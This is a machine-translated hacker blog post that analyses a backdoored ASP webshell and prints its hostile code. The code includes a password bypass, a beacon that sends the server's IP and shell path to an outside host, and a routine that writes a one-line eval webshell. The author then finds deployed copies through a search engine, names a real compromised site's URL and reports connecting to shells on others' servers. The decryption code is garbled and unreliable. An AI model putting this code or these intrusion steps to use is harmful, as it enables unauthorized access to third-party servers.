Full decryption and backdoor resolution of Firefox NEW WebShell 8.0

Jindao Ke

I don't know if this shell was given to me by a friend, but I can't remember it. This file encryption has no special features, but its method of leaving a backdoor is very interesting and unique. Let's take a look at this shell.
First






Needless to say about decryption. It is the reverse encryption method of 13th.

Function ShiSanFun (ShiSanObjstr)
ShiSanObjstr = Replace (ShiSanObjstr, "comment ","""")
For ShiSanI = 1 To Len (ShiSanObjstr)
If Mid (ShiSanObjstr, ShiSanI, 1) <> "shen" Then
ShiSanNewStr = Mid (ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr
Else
ShiSanNewStr = vbCrLf & ShiSanNewStr
End If
Next
ShiSanFun = ShiSanNewStr
End Function

Hacker Wei Encryption

Function UnEncode (temp)
But = 80
For I = 1 to len (temp)
If mid (temp, I, 1) <> "Lin" then
If Asc (Mid (temp, I, 1) <32 or Asc (Mid (temp, I, 1)> 126 Then
A = a & Chr (Asc (Mid (temp, I, 1 )))
Else
Pk = asc (mid (temp, I, 1)-
If pk> 126 then
Primary = pk-95
Elseif pk <32 then
Pk = pk + 95
End if
A = a & chr (pk)
End if
Else
A = a & vbcrlf
End if
Next
UnEncode =
End function

Batch decryption.

See the backdoor below.
First, let's look at the part of hacker Wei's encryption.

If request ("x") = "x" then
Session ("web2a2dmin") = UserPass
URL ()
End if

If Session ("web2a2dmin") <> UserPass Then
If Request. Form ("Pass") <> "Then
If Request. Form ("Pass") = UserPass Then
Session ("web2a2dmin") = UserPass
Response. Redirect URL
Else
Response. write "Verification Failed! "
End If

What is the obvious universal password test. asp? X = x


Another backdoor is interesting.

Urlencode the backdoor address, convert it to hexadecimal data, and check the code.

Userip = Request. ServerVariables ("HTTP_X_FORWARDED_FOR ")
If trim (userip) = "" Then
Userip = Request. ServerVariables ("REMOTE_ADDR ")
End if
Userhttp = request. serverVariables ("HTTP_REFERER ")
UrlAdd =" Http: // % 77% 77% 77% 2E % 31% 30% 30% 61% 67% 65% 2E % 63% 6E/% 73% 68% 6F % 70% 78/% 4A % 76% 2E % 53% 61% 70? % 6D % 73% 67 ="
UrlAdd = UrlAdd & Userip & ":" & Userhttp & "<br>"
GetUrl (UrlAdd)

First, determine whether to use the proxy server. If so, use HTTP_X_FORWARDED_FOR to obtain the real ip address. If not, use REMOTE_ADDR to obtain the ip address. Then, use HTTP_REFERER to obtain the shell address.
Assign the backdoor address to urladd, Which is decryptedHttp://www.100age.cn/shopvx/JS.asp? Msg =Then, use the Geturl function to send the ip address and shell address as parameters to the backdoor address for processing.

The Geturl function is as follows:

Function GetUrl (UrlAdd)
Set OpenSend = createobject ("Microsoft. XMLHTTP ")
SourceCode = OpenSend. open ("GET", UrlAdd, false)
OpenSend. send
End Function

The xmlhttp component of the server is also used for sending. The method is the same as that of the sad and evil shell, so the general method cannot capture packets locally.

How can I get the password? This is another interesting part of shell. He is a universal password, but he does not insert a universal password in this file, instead, a file named Filemap is generated in the same shell folder during login. asp.

This idea is good, and it is also a new backdoor method. View code

TempString = "<% eval request (" baomi "") % "&">"
Set Fso = Server. CreateObject ("Scripting. FileSystemObject ")
Set Fout = Fso. CreateTextFile (Server. Mappath ("Filemap. asp "))
Fout. Write tempString
Fout. Close
Set Fout = Nothing
Set Fso = Nothing

In this case, it will be okay. As long as a backdoor with the content of <% eval request ("baomi") is generated immediately after logon, you can log on directly. Here, I changed the password, you still need to protect it.

Now let's test this stuff. I search for Filemap. asp on gogole.



See Filemap. asp in the image folder.

Http://www.job365.org/Portals/176/zdxingxiang/admin/images/Filemap.asp

Drop the tool, enter the password, and connect
 






I Will google "Firefox NEW WebShell"






Tests show that URLs in the pink part can be connected. The first URL shell cannot run, but one sentence can be connected, and the second URL can be connected.

Some of them are useful, though not many, but I hope not to touch the data at will.

Well, to sum up, we will see that this shell is first to try whether the universal password is OK, and then we can try that sentence connection. It may save a lot of effort.